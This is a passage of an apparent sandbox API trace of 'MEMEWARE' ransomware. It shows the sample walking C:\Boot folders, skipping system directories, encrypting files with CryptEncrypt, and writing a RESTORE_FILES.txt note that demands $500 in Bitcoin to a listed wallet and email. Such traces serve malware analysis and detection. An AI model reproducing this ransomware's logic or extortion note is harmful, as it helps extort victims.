(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.565] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.565] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.566] CloseHandle (hObject=0xa4) returned 1 [0044.566] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="Program Files") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="Program Files (x86)") returned -1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0044.566] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0044.566] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0044.566] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0044.566] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0044.566] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0044.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.566] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.566] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0044.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.567] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0044.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.567] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.567] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.567] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0044.567] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.567] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.568] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.568] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.568] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\RESTORE_FILES.txt") returned 35 [0044.568] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\RESTORE_FILES.txt" (normalized: "c:\\boot\\da-dk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.569] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.569] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.569] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.569] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.569] CloseHandle (hObject=0xa4) returned 1 [0044.569] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Program Files") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="Program Files (x86)") returned -1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="$Recycle.bin") returned 1 [0044.569] lstrcmpiW (lpString1="de-DE", lpString2="System Volume Information") returned -1 [0044.569] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0044.570] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0044.570] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0044.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.570] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.570] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0044.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.570] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.570] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.570] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0044.570] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.570] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.570] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.571] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0044.571] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.571] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.571] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.571] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.571] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.571] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.571] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.571] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\RESTORE_FILES.txt") returned 35 [0044.571] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\RESTORE_FILES.txt" (normalized: "c:\\boot\\de-de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.571] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.571] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.572] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.572] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.572] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.572] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.572] CloseHandle (hObject=0xa4) returned 1 [0044.572] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Program Files") returned -1 [0044.572] lstrcmpiW (lpString1="el-GR", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="el-GR", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="el-GR", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0044.573] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0044.573] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0044.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.573] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0044.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.573] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.573] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.573] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0044.573] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.573] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.573] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.573] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0044.573] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.573] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.573] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.573] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.574] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.574] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.574] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\RESTORE_FILES.txt") returned 35 [0044.574] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\el-gr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.574] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.575] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.575] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.575] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.575] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.575] CloseHandle (hObject=0xa4) returned 1 [0044.575] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0044.575] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0044.576] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0044.576] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: 